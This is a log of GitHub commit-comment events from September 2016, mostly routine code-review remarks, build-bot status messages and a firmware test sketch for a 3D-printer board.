{"id":"4564858880","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"nitrogen-project/android_packages_apps_Settings"},"payload":{"comment":{"id":19027529,"position":null,"line":null,"path":null,"commit_id":"9797f55cd1eca60fa46f9c3e101fda8985ec03d1","created_at":"2016-09-14T21:56:09Z","updated_at":"2016-09-14T21:56:09Z","body":"https://github.com/BenzoRoms/packages_apps_Settings/commit/5d22f629975bb4002b8b10bffef130783f62cb67"}},"created_at":"2016-09-14T21:56:09Z"}
{"id":"4564861986","type":"CommitCommentEvent","actor":{"login":"WestLangley"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":19027536,"position":22,"line":397,"path":"src/math/Box3.js","commit_id":"5578c057a95b84972f80fecf134485e9666f0ea3","created_at":"2016-09-14T21:56:45Z","updated_at":"2016-09-14T21:56:45Z","body":"@mrdoob I like your renaming. `Line3.center()` is another good candidate to be renamed."}},"created_at":"2016-09-14T21:56:45Z"}
{"id":"4564869852","type":"CommitCommentEvent","actor":{"login":"borisdamevin"},"repo":{"name":"borisdamevin/laravel-mediable"},"payload":{"comment":{"id":19027546,"position":null,"line":null,"path":null,"commit_id":"bd1a847eb208eb95c32aea0f8b28e498385e502c","created_at":"2016-09-14T21:58:22Z","updated_at":"2016-09-14T21:58:22Z","body":"Laravel 5.3 (https://github.com/laravel/framework/commit/59410ce9270355359ba36b2a4391f05c1076e830)."}},"created_at":"2016-09-14T21:58:22Z"}
{"id":"4564870794","type":"CommitCommentEvent","actor":{"login":"borisdamevin"},"repo":{"name":"borisdamevin/laravel-mediable"},"payload":{"comment":{"id":19027549,"position":null,"line":null,"path":null,"commit_id":"8b167bcbf1d0bee9703848aadd1c836d20ba42de","created_at":"2016-09-14T21:58:33Z","updated_at":"2016-09-14T21:58:33Z","body":"Laravel 5.3 (https://github.com/laravel/framework/commit/59410ce9270355359ba36b2a4391f05c1076e830)."}},"created_at":"2016-09-14T21:58:33Z"}
{"id":"4564874721","type":"CommitCommentEvent","actor":{"login":"zcc2004"},"repo":{"name":"zcc2004/codcraftlab-Python-zachary-"},"payload":{"comment":{"id":19027562,"position":null,"line":null,"path":null,"commit_id":"5b06a4cda087b1fab8058cd09da3b4bed4614c4c","created_at":"2016-09-14T21:59:20Z","updated_at":"2016-09-14T21:59:20Z","body":"week 2 python"}},"created_at":"2016-09-14T21:59:20Z"}
{"id":"4564877056","type":"CommitCommentEvent","actor":{"login":"davisagli"},"repo":{"name":"oddbird/oddsite"},"payload":{"comment":{"id":19027568,"position":6,"line":10,"path":"templates/rst_display.html","commit_id":"bfd25c66edc34e6bb87c98972837b7f57ddc63c1","created_at":"2016-09-14T21:59:49Z","updated_at":"2016-09-14T21:59:49Z","body":"Got it. Why don't we just put this in `base.html` then?"}},"created_at":"2016-09-14T21:59:49Z"}
{"id":"4564879035","type":"CommitCommentEvent","actor":{"login":"georgekola"},"repo":{"name":"google/santa"},"payload":{"comment":{"id":19027573,"position":14,"line":35,"path":"Source/santad/SNTEventLog.m","commit_id":"1666e8b1271ca947b3af91fb5ba7a3a356d8516e","created_at":"2016-09-14T22:00:12Z","updated_at":"2016-09-14T22:00:12Z","body":"property by default are atomic. There is no need for them to be atomic, (set them to non-atomic) if they are initialized in init."}},"created_at":"2016-09-14T22:00:12Z"}
{"id":"4564879869","type":"CommitCommentEvent","actor":{"login":"boturnbow"},"repo":{"name":"mhesac/www.mhesac.org"},"payload":{"comment":{"id":19027575,"position":null,"line":null,"path":null,"commit_id":"50b5fa1826fd052a95d9b4b6023304c3df3d085f","created_at":"2016-09-14T22:00:21Z","updated_at":"2016-09-14T22:00:21Z","body":"@sharoneslick looks like you left off .pdf in the file name. I am fixing now."}},"created_at":"2016-09-14T22:00:21Z"}
{"id":"4564880311","type":"CommitCommentEvent","actor":{"login":"nhpatt"},"repo":{"name":"liferay/liferay-portal"},"payload":{"comment":{"id":19027576,"position":7,"line":8,"path":"modules/apps/screens/screens-service/bnd.bnd","commit_id":"609469e14751e86ec0ffddace7291ae8429e4cdd","created_at":"2016-09-14T22:00:26Z","updated_at":"2016-09-14T22:00:26Z","body":"We weren't sure about the changes permitted between 3.0 and 3.1 for example, if they don't allow removal of existing APIs, it could be better to specify allowing until 4.0 (3.0 is supported right now).\r\n\r\nThat causes us a bit of uneasiness, because we haven't tested the plugin against a possible future version 3.1 and a client could update their journal dependency and the screens compatibility plugin would deploy without complaining (instead of failing and forcing to update to a newer version of the plugin).\r\n\r\nWe were planning on testing the new versions (we usually develop the plugin against master or before the release of the plugin) and update the version ranges accordingly (even if suppose playing catch up with the other dependencies, we change more often than the APIs).\r\n\r\nBut allowing until the major version is ok for us, what we don't want is to release a different plugin version for 1.0, 2.0 or 3.0 of the journal dependency.\r\n\r\n"}},"created_at":"2016-09-14T22:00:26Z"}
{"id":"4564884287","type":"CommitCommentEvent","actor":{"login":"davisagli"},"repo":{"name":"oddbird/oddsite"},"payload":{"comment":{"id":19027581,"position":null,"line":null,"path":null,"commit_id":"05368249549ce101c279448864225d4885f8add3","created_at":"2016-09-14T22:01:06Z","updated_at":"2016-09-14T22:01:06Z","body":"👍 "}},"created_at":"2016-09-14T22:01:06Z"}
{"id":"4564885826","type":"CommitCommentEvent","actor":{"login":"sharoneslick"},"repo":{"name":"mhesac/www.mhesac.org"},"payload":{"comment":{"id":19027585,"position":null,"line":null,"path":null,"commit_id":"50b5fa1826fd052a95d9b4b6023304c3df3d085f","created_at":"2016-09-14T22:01:24Z","updated_at":"2016-09-14T22:01:24Z","body":"Thanks, Bo!\n\nOn Wed, Sep 14, 2016 at 4:00 PM, Bo Turnbow <notifications@github.com>\nwrote:\n\n> @sharoneslick <https://github.com/sharoneslick> looks like you left off\n> .pdf in the file name. I am fixing now.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mhesac/www.mhesac.org/commit/50b5fa1826fd052a95d9b4b6023304c3df3d085f#commitcomment-19027575>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AO9qIUPC7xMs_Fk1WBcvmmJDCtVEMcs5ks5qqG51gaJpZM4J9Spj>\n> .\n>\n\n\n\n-- \nSharon Eslick\nDirector of Executive Support Services\nseslick@safmt.org\nPhone (406) 495-7302\nFax (406) 495-7856\n\n-- \n----------------------------------------------\nThis email and any files transmitted with may be confidential and are \nintended solely for the use of the individual or entity to which they are \naddressed. If you have received this email in error please notify the \nsender immediately and delete this e-mail from your system. This message \nmay contain confidential information and the contents of this email are \nstrictly prohibited from being disseminated, distributed, printed or copied.\n\nStudent Assistance Foundation\n2500 Broadway\nHelena MT 59601\nhttp://www.safmt.org\n----------------------------------------------\n"}},"created_at":"2016-09-14T22:01:24Z"}
{"id":"4564889656","type":"CommitCommentEvent","actor":{"login":"tappel2018"},"repo":{"name":"raustin2018/DeleteMe"},"payload":{"comment":{"id":19027594,"position":null,"line":null,"path":null,"commit_id":"ef05c9eb680bbf5645f1e9593118f687bfca4dd4","created_at":"2016-09-14T22:02:10Z","updated_at":"2016-09-14T22:02:10Z","body":"# \r\n\r\n> [`_**(niceme.me)**_`]"}},"created_at":"2016-09-14T22:02:10Z"}
{"id":"4564890523","type":"CommitCommentEvent","actor":{"login":"tappel2018"},"repo":{"name":"raustin2018/DeleteMe"},"payload":{"comment":{"id":19027596,"position":null,"line":null,"path":null,"commit_id":"ef05c9eb680bbf5645f1e9593118f687bfca4dd4","created_at":"2016-09-14T22:02:19Z","updated_at":"2016-09-14T22:02:19Z","body":"(niceme.me)"}},"created_at":"2016-09-14T22:02:19Z"}
{"id":"4564891021","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19027599,"position":null,"line":null,"path":null,"commit_id":"a60d175334693805ed90d094d4a39efe100e2c32","created_at":"2016-09-14T22:02:24Z","updated_at":"2016-09-14T22:02:24Z","body":"i think i'll commit this code, which basically deletes all rc.* stuff\nbut rc.local:\n\nRC_STUFF=\"$(ls ./etc/rc.d/rc.* | grep -v \"/rc.local$\" | tr '\\n' ' ')\"\necho \"Removing $RC_STUFF\"\nrm -f $RC_STUFF\n"}},"created_at":"2016-09-14T22:02:24Z"}
{"id":"4564891909","type":"CommitCommentEvent","actor":{"login":"tappel2018"},"repo":{"name":"raustin2018/DeleteMe"},"payload":{"comment":{"id":19027600,"position":null,"line":null,"path":null,"commit_id":"ef05c9eb680bbf5645f1e9593118f687bfca4dd4","created_at":"2016-09-14T22:02:34Z","updated_at":"2016-09-14T22:02:34Z","body":"[](NiceMe.me)"}},"created_at":"2016-09-14T22:02:34Z"}
{"id":"4564893598","type":"CommitCommentEvent","actor":{"login":"tappel2018"},"repo":{"name":"raustin2018/DeleteMe"},"payload":{"comment":{"id":19027603,"position":null,"line":null,"path":null,"commit_id":"ef05c9eb680bbf5645f1e9593118f687bfca4dd4","created_at":"2016-09-14T22:02:54Z","updated_at":"2016-09-14T22:02:54Z","body":"[Memes](niceme.me)"}},"created_at":"2016-09-14T22:02:54Z"}
{"id":"4564895830","type":"CommitCommentEvent","actor":{"login":"tappel2018"},"repo":{"name":"raustin2018/DeleteMe"},"payload":{"comment":{"id":19027618,"position":null,"line":null,"path":null,"commit_id":"ef05c9eb680bbf5645f1e9593118f687bfca4dd4","created_at":"2016-09-14T22:03:21Z","updated_at":"2016-09-14T22:03:21Z","body":"[Memes](http://niceme.me)"}},"created_at":"2016-09-14T22:03:21Z"}
{"id":"4564898915","type":"CommitCommentEvent","actor":{"login":"joolswills"},"repo":{"name":"RetroPie/RetroPie-Setup"},"payload":{"comment":{"id":19027639,"position":null,"line":null,"path":null,"commit_id":"33a3a7e287c1e31df12b3374805294fda96746a6","created_at":"2016-09-14T22:04:01Z","updated_at":"2016-09-14T22:04:01Z","body":"There will be no image of 4.0.3 - use the forum for support."}},"created_at":"2016-09-14T22:04:01Z"}
{"id":"4564899065","type":"CommitCommentEvent","actor":{"login":"jgerigmeyer"},"repo":{"name":"oddbird/oddsite"},"payload":{"comment":{"id":19027642,"position":6,"line":10,"path":"templates/rst_display.html","commit_id":"bfd25c66edc34e6bb87c98972837b7f57ddc63c1","created_at":"2016-09-14T22:04:03Z","updated_at":"2016-09-14T22:04:03Z","body":"Yeah, could do. I guess just because I was doing it in the context of a blog post, but there's no harm in making that logic apply to the rest of the site (and even here it already applies to most pages). Ok, will change."}},"created_at":"2016-09-14T22:04:03Z"}
{"id":"4564903597","type":"CommitCommentEvent","actor":{"login":"nicoolas25"},"repo":{"name":"benoittgt/PhubMe"},"payload":{"comment":{"id":19027667,"position":null,"line":null,"path":null,"commit_id":"e837a2a437814cb2392d4909796936a7e2f2dd45","created_at":"2016-09-14T22:04:59Z","updated_at":"2016-09-14T22:04:59Z","body":"Yep, completely!"}},"created_at":"2016-09-14T22:04:59Z"}
{"id":"4564907043","type":"CommitCommentEvent","actor":{"login":"kkrysiak"},"repo":{"name":"fgomez02/useful_code"},"payload":{"comment":{"id":19027683,"position":69,"line":69,"path":"Survival_Chi_square_5.R","commit_id":"3a36a2fcb7d024e42bddb4876c04bc8541d4afa9","created_at":"2016-09-14T22:05:43Z","updated_at":"2016-09-14T22:05:43Z","body":"Is this ever used again?"}},"created_at":"2016-09-14T22:05:43Z"}
{"id":"4564911524","type":"CommitCommentEvent","actor":{"login":"sirikfoll"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19027694,"position":null,"line":null,"path":null,"commit_id":"025002b90789e3f506e072e68cfa68c90eef296a","created_at":"2016-09-14T22:06:28Z","updated_at":"2016-09-14T22:06:28Z","body":"Updates #10876"}},"created_at":"2016-09-14T22:06:28Z"}
{"id":"4564914471","type":"CommitCommentEvent","actor":{"login":"Engineer3DPrototyping"},"repo":{"name":"repetier/Repetier-Firmware"},"payload":{"comment":{"id":19027701,"position":null,"line":null,"path":null,"commit_id":"b3286c056ed9580809a60a04755b007adfc878f1","created_at":"2016-09-14T22:07:07Z","updated_at":"2016-09-14T22:07:07Z","body":"when I look at the test firmware for the board(marlin4due) \r\n\r\n#include <SdFat.h>\r\n#include \"test.h\"\r\n\r\nSdFat sd;\r\n\r\n  static double read_max31855(int pin_cs) {\r\n\r\n\r\n\r\n    uint32_t value = 0;\r\n\r\n\r\n\r\n    SPI.beginTransaction(SPISettings(14000000, MSBFIRST, SPI_MODE0));\r\n\r\n\r\n    digitalWrite(pin_cs, LOW); // select chip\r\n\r\n    union bytes_to_uint32 {\r\n      uint8_t bytes[4];\r\n      uint32_t integer;\r\n    } buffer;\r\n    \r\n    for (int i=3;i>=0;i--) {\r\n      buffer.bytes[i] = SPI.transfer(0x00);\r\n    }\r\n    value = buffer.integer;\r\n\r\n    digitalWrite(pin_cs, HIGH); // select chip\r\n\r\n    SPI.endTransaction();\r\n\r\n\r\n    if (value & 0x7) {\r\n      return NAN;\r\n    }\r\n    else if(value & 0x80000000) {\r\n      value = 0xFFFFC000 | ((value >> 18) & 0x00003FFFF);\r\n    }\r\n    else {\r\n      value >>= 18;\r\n    }\r\n\r\n  \r\n    return value* 0.25;\r\n  }\r\n\r\n\r\n\r\n\r\n// the setup function runs once when you press reset or power the board\r\nvoid setup() {\r\n\r\n  // initialize digital pin 13 as an output.\r\n  pinMode(LEDDBG, OUTPUT);\r\n  digitalWrite(LEDDBG, HIGH);\r\n  pinMode(2, OUTPUT);\r\n  pinMode(27, OUTPUT);\r\n  pinMode(SD_DETECT, INPUT_PULLUP);\r\n  \r\n  \r\n  digitalWrite(27, LOW);\r\n  digitalWrite(27, HIGH);\r\n  delay(1);\r\n  digitalWrite(27, LOW);\r\n  delay(1);\r\n  digitalWrite(27, HIGH);\r\n  delay(1);\r\n  digitalWrite(27, HIGH);\r\n  delay(1);\r\n  digitalWrite(27, LOW);\r\n  delay(1);\r\n  digitalWrite(27, HIGH);\r\n  delay(1);\r\n  digitalWrite(27, LOW);\r\n  \r\n  for (int i=0; i<AXISCOUNT; i++) {\r\n    pinMode(axes[i].step, OUTPUT);\r\n    pinMode(axes[i].dir, OUTPUT);\r\n    pinMode(axes[i].enable, OUTPUT);\r\n    digitalWrite(axes[i].enable, LOW);\r\n  }\r\n\r\n  for (int i=0; i<LEDCOUNT; i++) \r\n    pinMode(leds[i], OUTPUT);\r\n  \r\n  for (int i = 0; i< SizeOfArray(tempsensors); i++) {\r\n    pinMode(A0 + tempsensors[i],INPUT);\r\n  }\r\n  \r\n  /* enable all CS pins */\r\n  pinMode(SS, OUTPUT);     // change this to 53 on a mega\r\n  pinMode(CS1, OUTPUT); \r\n  pinMode(CS2, OUTPUT); \r\n  pinMode(CS3, OUTPUT); \r\n  pinMode(CS4, OUTPUT); \r\n  pinMode(CS_ETH, OUTPUT); \r\n  pinMode(CS_SD, OUTPUT); \r\n  \r\n  digitalWrite(CS_ETH, HIGH); \r\n  digitalWrite(CS_SD, HIGH); \r\n  digitalWrite(CS1, HIGH); \r\n  digitalWrite(CS2, HIGH); \r\n  digitalWrite(CS3, HIGH); \r\n  digitalWrite(CS4, HIGH); \r\n  \r\n  SerialUSB.begin(115200);\r\nSPI.begin();\r\n}\r\n\r\nunsigned long prevMilLed = millis();\r\nunsigned long prevMil12V = millis();\r\nunsigned long prevStep = micros();\r\nunsigned long prevDumpTemp = millis();\r\nint ledstate =0;\r\n\r\n// the loop function runs over and over again forever\r\nvoid loop() {\r\n  \r\n  if (millis() - prevMilLed > 2000) {\r\n    \r\n    digitalWrite(LEDDBG, HIGH);\r\n    for (int i=0; i<AXISCOUNT; i++) {\r\n\r\n      digitalWrite(axes[i].dir, HIGH);\r\n\r\n    }   \r\n    prevMilLed = millis();\r\n  }\r\n  else  if (millis() - prevMilLed > 1000) {\r\n    \r\n    digitalWrite(LEDDBG, LOW);\r\n    \r\n    for (int i=0; i<AXISCOUNT; i++) {\r\n\r\n      digitalWrite(axes[i].dir, LOW);\r\n  \r\n    }   \r\n    \r\n\r\n    \r\n  }\r\n  \r\n  if (millis() - prevDumpTemp >500) {\r\n    \r\n    String temps = \"AD values - \";\r\n    for (int i = 0; i< SizeOfArray(tempsensors); i++) {\r\n    int t = analogRead(tempsensors[i]);\r\n    temps.concat(\" T\");\r\n    temps.concat(i);\r\n    temps.concat(\": \");\r\n    temps.concat(t);\r\n    }\r\n    SerialUSB.println(temps);\r\n    \r\n    \r\n    SerialUSB.print(\"TC values - \");\r\n\r\n     double c = read_max31855(CS1);\r\n     if (isnan(c)) {\r\n       SerialUSB.print(\"1=ERR\"); \r\n     } else {\r\n       SerialUSB.print(\"1=\"); \r\n       SerialUSB.print(c);\r\n     }\r\n     \r\n     c = read_max31855(CS2);\r\n     if (isnan(c)) {\r\n       SerialUSB.print(\" 2=ERR\"); \r\n     } else {\r\n       SerialUSB.print(\" 2=\");\r\n       SerialUSB.print(c);\r\n     }\r\n     \r\n        c =read_max31855(CS3);\r\n     if (isnan(c)) {\r\n       SerialUSB.print(\" 3=ERR\"); \r\n     } else {\r\n       SerialUSB.print(\" 3=\");\r\n       SerialUSB.print(c);\r\n     }\r\n     \r\n        c = read_max31855(CS4);\r\n     if (isnan(c)) {\r\n       SerialUSB.print(\" 4=ERR\"); \r\n     } else {\r\n       SerialUSB.print(\" 4=\");\r\n       SerialUSB.print(c);\r\n     }\r\n     SerialUSB.println( \"\");\r\n     \r\n    if (digitalRead(SD_DETECT)==1) {\r\n       SerialUSB.println(\"SD Card: No card detected\"); \r\n    }\r\n    else{\r\n      if (!sd.cardBegin(CS_SD, SPI_HALF_SPEED)){\r\n       SerialUSB.println(\"SD Card: NOT OK!\");\r\n       \r\n     }\r\n     else \r\n     SerialUSB.println(\"SD Card: OK!\");\r\n   }\r\n   prevDumpTemp =  millis();\r\n   \r\nT\r\n[ultratronicstest(2).zip](https://github.com/repetier/Repetier-Firmware/files/473548/ultratronicstest.2.zip)\r\n\r\nhey use SPI.beginTransaction and SPI.endTransaction would this be terrible to implement? \r\nIt appears that no matter how I tell the CS pin of the sd card to go high I can't prevent 2 cs lines from being low at one time.  \r\n"}},"created_at":"2016-09-14T22:07:07Z"}
{"id":"4564919973","type":"CommitCommentEvent","actor":{"login":"mrdoob"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":19027717,"position":22,"line":397,"path":"src/math/Box3.js","commit_id":"5578c057a95b84972f80fecf134485e9666f0ea3","created_at":"2016-09-14T22:08:19Z","updated_at":"2016-09-14T22:08:19Z","body":"Done! 👍"}},"created_at":"2016-09-14T22:08:19Z"}
{"id":"4564923451","type":"CommitCommentEvent","actor":{"login":"kkrysiak"},"repo":{"name":"fgomez02/useful_code"},"payload":{"comment":{"id":19027731,"position":237,"line":237,"path":"Survival_Chi_square_5.R","commit_id":"3a36a2fcb7d024e42bddb4876c04bc8541d4afa9","created_at":"2016-09-14T22:09:07Z","updated_at":"2016-09-14T22:09:07Z","body":"Can you add some comments to say what this function does?"}},"created_at":"2016-09-14T22:09:07Z"}
{"id":"4564935129","type":"CommitCommentEvent","actor":{"login":"kkrysiak"},"repo":{"name":"fgomez02/useful_code"},"payload":{"comment":{"id":19027759,"position":237,"line":237,"path":"Survival_Chi_square_5.R","commit_id":"3a36a2fcb7d024e42bddb4876c04bc8541d4afa9","created_at":"2016-09-14T22:11:40Z","updated_at":"2016-09-14T22:11:40Z","body":"Subset on patients that aren't NA for the outcome. I can see what it does, it just doesn't have a comment."}},"created_at":"2016-09-14T22:11:40Z"}
{"id":"4564936064","type":"CommitCommentEvent","actor":{"login":"ricardonect"},"repo":{"name":"ricardonect/ecoServidor"},"payload":{"comment":{"id":19027764,"position":null,"line":null,"path":null,"commit_id":"6c6ac938094fff6ebb37beaf8a9a8c55925b8902","created_at":"2016-09-14T22:11:53Z","updated_at":"2016-09-14T22:11:53Z","body":"Eliminación clases EcoInterface.java y EcoResponder.java"}},"created_at":"2016-09-14T22:11:53Z"}
{"id":"4564938083","type":"CommitCommentEvent","actor":{"login":"tarantonio"},"repo":{"name":"peonso/tibialegacyserver"},"payload":{"comment":{"id":19027765,"position":null,"line":null,"path":null,"commit_id":"1b9acfa06bb07e8db65ab141fb742ba5320c5fa4","created_at":"2016-09-14T22:12:20Z","updated_at":"2016-09-14T22:12:20Z","body":"Santa script is in the gen-xmas.ndb leaked file"}},"created_at":"2016-09-14T22:12:20Z"}
{"id":"4564963802","type":"CommitCommentEvent","actor":{"login":"jamesnetherton"},"repo":{"name":"jamesnetherton/examples"},"payload":{"comment":{"id":19027817,"position":5,"line":5,"path":"s2i-java/.s2i/bin/assemble","commit_id":"f4e6e971e287d212b32ee3a2346c1854c81497bd","created_at":"2016-09-14T22:18:05Z","updated_at":"2016-09-14T22:18:05Z","body":"Test"}},"created_at":"2016-09-14T22:18:05Z"}
{"id":"4564970738","type":"CommitCommentEvent","actor":{"login":"RodrigonBR"},"repo":{"name":"so33a/deque-RodrigonBR"},"payload":{"comment":{"id":19027832,"position":null,"line":null,"path":null,"commit_id":"b42becc668e5efa9b1cfa360d3eab8646d0ffc16","created_at":"2016-09-14T22:19:44Z","updated_at":"2016-09-14T22:19:44Z","body":"Deque!?!"}},"created_at":"2016-09-14T22:19:44Z"}
{"id":"4564972026","type":"CommitCommentEvent","actor":{"login":"grefab"},"repo":{"name":"davisking/dlib"},"payload":{"comment":{"id":19027835,"position":null,"line":null,"path":null,"commit_id":"48df23a0e065e01c5ba176d4999fffb0d9a29e02","created_at":"2016-09-14T22:20:02Z","updated_at":"2016-09-14T22:20:02Z","body":"What feature of C++11 wasn't supported that caused this commit?\r\n(I ask because I intend to use the DNN component - which relies on C++11 - in MSVS2015.)"}},"created_at":"2016-09-14T22:20:02Z"}
{"id":"4564978024","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19027859,"position":null,"line":null,"path":null,"commit_id":"abaa676fdf2a59f7d9311e056e34cfbe807ca78e","created_at":"2016-09-14T22:21:21Z","updated_at":"2016-09-14T22:21:21Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 34](http://teamcity.otenv.com/viewLog.html?buildId=5213702&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-14T22:21:21Z"}
{"id":"4564981883","type":"CommitCommentEvent","actor":{"login":"kevinmusker"},"repo":{"name":"kevinmusker/aws"},"payload":{"comment":{"id":19027869,"position":null,"line":null,"path":null,"commit_id":"3adf22d99e15ec397016fd7c83ad039181db6650","created_at":"2016-09-14T22:22:14Z","updated_at":"2016-09-14T22:22:14Z","body":"If a caller tries to access a bucket that is not in the allowed list, an exception is thrown due to the FetchResult object resulting from the load call not being properly formed.\r\n\r\nThis change brings the behaviour of the access of a disallowed bucket in line with the access of a non-existent bucket - returning a 404 Not Found."}},"created_at":"2016-09-14T22:22:14Z"}
{"id":"4564982215","type":"CommitCommentEvent","actor":{"login":"bcosca"},"repo":{"name":"bcosca/fatfree-core"},"payload":{"comment":{"id":19027872,"position":null,"line":null,"path":null,"commit_id":"ce75d0a72c9c9896290cf5a6d2c57fb01232f89b","created_at":"2016-09-14T22:22:17Z","updated_at":"2016-09-14T22:22:17Z","body":"Granted :)"}},"created_at":"2016-09-14T22:22:17Z"}
{"id":"4564982705","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19027873,"position":121,"line":0,"path":"HelloWorld/Program.cs","commit_id":"5bce790fa155613b7833a1d49d063a9758d45efc","created_at":"2016-09-14T22:22:23Z","updated_at":"2016-09-14T22:22:23Z","body":"Блестяще)"}},"created_at":"2016-09-14T22:22:23Z"}
{"id":"4564989247","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19027883,"position":null,"line":null,"path":null,"commit_id":"abaa676fdf2a59f7d9311e056e34cfbe807ca78e","created_at":"2016-09-14T22:23:53Z","updated_at":"2016-09-14T22:23:53Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 34](http://teamcity.otenv.com/viewLog.html?buildId=5213702&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 28 Build time: 00:02:32"}},"created_at":"2016-09-14T22:23:53Z"}
{"id":"4564995637","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19027902,"position":null,"line":null,"path":null,"commit_id":"abaa676fdf2a59f7d9311e056e34cfbe807ca78e","created_at":"2016-09-14T22:25:17Z","updated_at":"2016-09-14T22:25:17Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 35](http://teamcity.otenv.com/viewLog.html?buildId=5213711&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-14T22:25:17Z"}
{"id":"4564999134","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"Priya91/corefx-1"},"payload":{"comment":{"id":19027911,"position":5,"line":8,"path":"src/System.ComponentModel.TypeConverter/pkg/System.ComponentModel.TypeConverter.pkgproj","commit_id":"5829fb46ddb3957cb98479dde47b89cadab58858","created_at":"2016-09-14T22:26:06Z","updated_at":"2016-09-14T22:26:06Z","body":"You shouldn't need this, we will grab this asset from the package harvesting so you can remove this whole ProjectReference and also remove the project.json and depproj that you added."}},"created_at":"2016-09-14T22:26:06Z"}
{"id":"4564999716","type":"CommitCommentEvent","actor":{"login":"lau"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":19027912,"position":218,"line":758,"path":"lib/elixir/lib/calendar.ex","commit_id":"e50735ff2a7c16cc7705d8fa59af906e986c19f7","created_at":"2016-09-14T22:26:13Z","updated_at":"2016-09-14T22:26:13Z","body":"This is jarring to me 😄 A to_unix that accepts a `NaiveDateTime` will cause problems for people for sure. If this is made for some Ecto use cases where we don't want a performance hit from converting to a DateTime struct, couldn't this code be a private function in Ecto? Treating non-UTC datetimes as unix time seems like a specific database hack. Something that does not have to be in the public API of Elixir."}},"created_at":"2016-09-14T22:26:13Z"}
{"id":"4565003017","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"Priya91/corefx-1"},"payload":{"comment":{"id":19027922,"position":9,"line":12,"path":"src/System.ComponentModel.TypeConverter/pkg/System.ComponentModel.TypeConverter.pkgproj","commit_id":"5829fb46ddb3957cb98479dde47b89cadab58858","created_at":"2016-09-14T22:26:59Z","updated_at":"2016-09-14T22:26:59Z","body":"In here you should have \r\n```xml\r\n<SupportedFramework>net463;netcoreapp1.1;$(AllXamarinFrameworks)</SupportedFramework> \r\n```"}},"created_at":"2016-09-14T22:26:59Z"}
{"id":"4565004267","type":"CommitCommentEvent","actor":{"login":"LuisPro"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":19027927,"position":null,"line":null,"path":null,"commit_id":"7a5d0df083e473d86aa6de9a567464c9e6224aa0","created_at":"2016-09-14T22:27:18Z","updated_at":"2016-09-14T22:27:18Z","body":"my browser told me that http://opentibia.net/topic/59592-release-advanced-npc-system-v30a/ is not safe website."}},"created_at":"2016-09-14T22:27:18Z"}
{"id":"4565004279","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19027928,"position":null,"line":null,"path":null,"commit_id":"abaa676fdf2a59f7d9311e056e34cfbe807ca78e","created_at":"2016-09-14T22:27:18Z","updated_at":"2016-09-14T22:27:18Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 35](http://teamcity.otenv.com/viewLog.html?buildId=5213711&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 28 Build time: 00:02:01"}},"created_at":"2016-09-14T22:27:18Z"}
{"id":"4565007412","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"Priya91/corefx-1"},"payload":{"comment":{"id":19027937,"position":4,"line":9,"path":"src/System.ComponentModel.TypeConverter/src/System.ComponentModel.TypeConverter.csproj","commit_id":"5829fb46ddb3957cb98479dde47b89cadab58858","created_at":"2016-09-14T22:27:59Z","updated_at":"2016-09-14T22:27:59Z","body":"You shouldn't need this line. I would expect some changes in your src/System.Component.TypeConverter.builds file that basically remove all builds except for one for netstandard1.7 and one for net463"}},"created_at":"2016-09-14T22:27:59Z"}
{"id":"4565012585","type":"CommitCommentEvent","actor":{"login":"karkul"},"repo":{"name":"karkul/elk-docker"},"payload":{"comment":{"id":19027946,"position":null,"line":null,"path":null,"commit_id":"e8845dbaf2982691157aa206ddcecada37680d18","created_at":"2016-09-14T22:29:11Z","updated_at":"2016-09-14T22:29:11Z","body":"reverted"}},"created_at":"2016-09-14T22:29:11Z"}
{"id":"4565024561","type":"CommitCommentEvent","actor":{"login":"viesca03"},"repo":{"name":"viesca03/CollectionsApp"},"payload":{"comment":{"id":19027968,"position":null,"line":null,"path":null,"commit_id":"99c98167e98dea8eeb95818eb9c4e6651fca30c3","created_at":"2016-09-14T22:31:55Z","updated_at":"2016-09-14T22:31:55Z","body":"This is my first commit"}},"created_at":"2016-09-14T22:31:55Z"}
